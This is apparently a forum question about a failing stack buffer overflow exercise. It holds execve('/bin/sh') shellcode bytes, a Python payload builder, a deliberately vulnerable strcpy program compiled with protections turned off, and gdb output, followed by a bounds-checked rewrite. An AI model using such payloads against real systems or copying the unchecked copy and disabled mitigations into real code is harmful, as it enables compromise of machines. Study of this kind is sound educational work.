maxgonz

Reputation: 15

Having trouble with a buffer overflow

Shellcode: https://www.exploit-db.com/raw/42179

Exploit code (python):

sh = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
retaddr = "\x7f\xff\xff\xff\x00\x50\xe6"
print(sh + ("A" * (120 - len(sh) - 4)) + retaddr)

Vulnerable code (C):

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char buffer[100];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        exit(EXIT_FAILURE);
    }

    printf("buffer is here: %p\n", &buffer);
    strcpy(buffer, argv[1]);
    printf("copied %s into buffer\n", argv[1]);
    return 0;
}

The virtual machine I am using is: ubuntu-9.04-server-amd64 (2.6.28-11).

How I compiled the vulnerable code:

gcc vuln.c -U_FORTIFY_SOURCE -fno-pie -fno-stack-protector -fno-omit-frame-pointer -ggdb -z execstack -o vuln

The problem I seem to be having is that I can't figure out how to get the rip register to go to the correct return address.

Output:

...
buffer is here: 0x7fffffffe650
...
Program received signal SIGSEGV, Segmentation fault.
0x0007ffff700e650 in ?? ()

Could anyone help?

Upvotes: 0

Views: 174
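For comparison, here is a bounded-copy version of the vulnerable program from the question (an added example, not the asker's code). The only functional change is that the copy refuses any argument that would not fit in buffer[] together with its NUL terminator, which removes the overflow the post depends on; the check lives in its own function so it can be tested on its own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 100

/* Copy src into dst only if it fits, NUL terminator included.
 * Returns 0 on success and -1 when src is too long; in the failure
 * case dst is left as an empty string rather than partially filled. */
int copy_bounded(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {          /* no room for the NUL: strcpy would overflow */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);   /* n + 1 copies the terminator as well */
    return 0;
}

/* Same shape as the program in the question. The original build flags
 * (-fno-stack-protector, -z execstack, -fno-pie) switch off the
 * mitigations that would normally catch or blunt this overflow, so the
 * length check here is the only thing standing between argv[1] and the
 * saved frame pointer and return address above buffer[]. */
int main(int argc, char *argv[]) {
    char buffer[BUF_SIZE];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <str>\n", argv[0]);
        return EXIT_FAILURE;
    }
    if (copy_bounded(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "input too long (max %zu bytes)\n", sizeof buffer - 1);
        return EXIT_FAILURE;
    }
    printf("copied %s into buffer\n", buffer);
    return 0;
}
```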

Answers (0)
